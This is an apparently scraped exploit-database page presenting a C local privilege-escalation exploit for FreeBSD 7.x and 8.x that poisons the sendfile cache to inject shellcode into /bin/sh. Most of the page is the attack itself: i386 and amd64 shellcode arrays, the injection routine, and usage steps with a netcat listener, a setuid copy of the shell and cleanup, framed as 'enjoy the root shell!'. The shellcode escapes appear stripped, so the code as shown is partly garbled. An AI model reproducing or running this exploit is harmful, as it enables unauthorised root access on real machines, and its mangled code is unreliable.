Home / os / win7

[local exploits] - FreeBSD 2010 8.*, 7.* Local Root Exploit

Posted on 01 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>FreeBSD 2010 8.*, 7.* Local Root Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='FreeBSD 2010 8.*, 7.* Local Root Exploit by Kingcope in local exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>========================================
FreeBSD 2010 8.*, 7.* Local Root Exploit
========================================

/*
 freebsd mbufs() sendfile cache poisoning-priv escalation 
 x86/x64 local root xpl v2 by Hackeri-AL
 2010
 --
 tested on: 8.1-RC1, 8.0-RELEASE, 7.3-RELEASE and
 7.2-RELEASE-p8 (xd personally did 7.2 test)
 poisons /bin/sh to contain shellcode which does this...
 &#039;
 chmod a+s /tmp/sh
 chown root /tmp/sh
 execve /tmp/sh2
 &#039;
 how to use ths is VERY important it is NOT your standard type,
 DONT start a listener as normal...let this do its shit..
 and then again, there is a MUCH simpler way you could redo
 this exploit but, thats for you to find ;) -xd
 
 box 1 (TARGET):
 $ cp /bin/sh /tmp/sh
 $ cp /bin/sh /tmp/sh2
 $ gcc cache.c -o cache
 
 box 2 (LISTENER):
 $ nc -l 7030
 
 on box 1 do:
 for i386 type:
 $ ./cache 1
 for amd64 type:
 $ ./cache 2
 
 ok now lets hope this worked and injected the shellcode,should,
 /bin/sh should be execed by the system as root in ~5 mins if lucky :)
 
NOW DO:
 $ /tmp/sh
AND cleanup:
 # cp -f /tmp/sh2 /bin/sh
 enjoy the root shell!
*/
 
// this juarez is now private on #darknet
// http://www.youtube.com/watch?v=JtgInqNNpCI
// http://www.youtube.com/watch?v=IdbRWrY4QBI
 
#include &lt;sys/types.h&gt; 
#include &lt;sys/socket.h&gt;
#include &lt;sys/uio.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;sys/select.h&gt;
#include &lt;sys/stat.h&gt;
#include &lt;strings.h&gt;
#include &lt;stdio.h&gt; 
#include &lt;string.h&gt;
#include &lt;err.h&gt;
 
main (int argc, char *argv[]) {
  int s, f, k2;
  struct sockaddr_in addr;
  int flags;
 
  char str32[]=
  &quot;x31xc0x6ax00x68x70x2fx73x68x68x2fx2fx74x6dx89xe3&quot;
  &quot;x50x50x53xb0x10x50xcdx80x68xedx0dx00x00x53xb0x0f&quot;
  &quot;x50xcdx80x31xc0x6ax00x68x2fx73x68x32x68x2fx74x6d&quot;
  &quot;x70x89xe3x50x54x53x50xb0x3bxcdx80&quot;;
 
  char str64[]=
  &quot;x48x31xc0x99xb0x10x48xbfxffx2fx74x6dx70x2fx73x68&quot;
  &quot;x48xc1xefx08x57x48x89xe7x48x31xf6x48x31xd2x0fx05&quot;
  &quot;xb0x0fx48x31xf6x66xbexedx0dx0fx05x48x31xc0x99xb0&quot;
  &quot;x3bx48xbfx2fx74x6dx70x2fx73x68x32x6ax00x57x48x89&quot;
  &quot;xe7x57x52x48x89xe6x0fx05&quot;;
 
  char buf[10000];
  char *p;
  struct stat sb;
  int n;
  fd_set wset;   
  int64_t size;  
  off_t sbytes;  
  off_t sent = 0;
  int chunk;   
  int arch = 3;
 
  if (argc != 2) {
    printf(&quot;[+] Define architecture i386 or amd64 (1/2)
&quot;);
    return;
 
  }
 
  if (strcmp(argv[1], &quot;1&quot;) == 0)
  arch=1;
  if (strcmp(argv[1], &quot;2&quot;) == 0)
  arch=2;
 
  if (arch == 3) {
    printf(&quot;[+] Define architecture i386 or amd64 (1/2)
&quot;);
    return;
  }
 
  s = socket(AF_INET, SOCK_STREAM, 0);
  bzero(&amp;addr, sizeof(addr));
  addr.sin_family = AF_INET;  
  addr.sin_port = htons(7030);
  addr.sin_addr.s_addr = inet_addr(&quot;127.0.0.1&quot;);
  n = connect(s, (struct sockaddr *)&amp;addr, sizeof (addr));
 
  if (n &lt; 0)
  warn (&quot;[-] Failed to connect&quot;);
  f = open(&quot;/bin/sh&quot;, O_RDONLY);
  if (f&lt;0)
  warn(&quot;[-] Failed to open file&quot;);
  n = fstat(f, &amp;sb);
  if (n&lt;0)
  warn(&quot;[-] fstat failed&quot;);
 
  size = sb.st_size;
  chunk = 0;
  flags = fcntl(f, F_GETFL);
  flags |= O_NONBLOCK;
  fcntl(f, F_SETFL, flags);
  while (size &gt; 0) {
    FD_ZERO(&amp;wset);  
    FD_SET(s, &amp;wset);
    n = select(f+1, NULL, &amp;wset, NULL, NULL);
    if (n &lt; 0)
    continue;
      if (chunk &gt; 0) {
      sbytes = 0;   
      if (arch == 1)
      n = sendfile(f, s, 2048*2, chunk, NULL, &amp;sbytes,0);
      if (arch == 2)
      n = sendfile(f, s, 1204*6, chunk, NULL, &amp;sbytes,0);
 
      if (n &lt; 0)
      continue; 
      chunk -= sbytes;
      size -= sbytes; 
      sent += sbytes; 
      continue;
    }
    chunk = 2048;
    memset(buf, &#039;&#039;, sizeof buf);
    if (arch == 1) {
      for (k2=0;k2&lt;256;k2++) {
        buf[k2] = 0x90;
      }
      p = buf;
      p = p + k2;
      memcpy(p, str32, sizeof str32);
      n = k2 + sizeof str32;
      p = buf;
    }
    if (arch == 2) {
      for (k2=0;k2&lt;100;k2++) {
        buf[k2] = 0x90;
      }
      p = buf;
      p = p + k2;
      memcpy(p, str64, sizeof str64);
      n = k2 + sizeof str64;
      p = buf;
    }
    write(s, p, n);
  }
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-01]</pre></body></html>

 

TOP

Malware :

Exploits :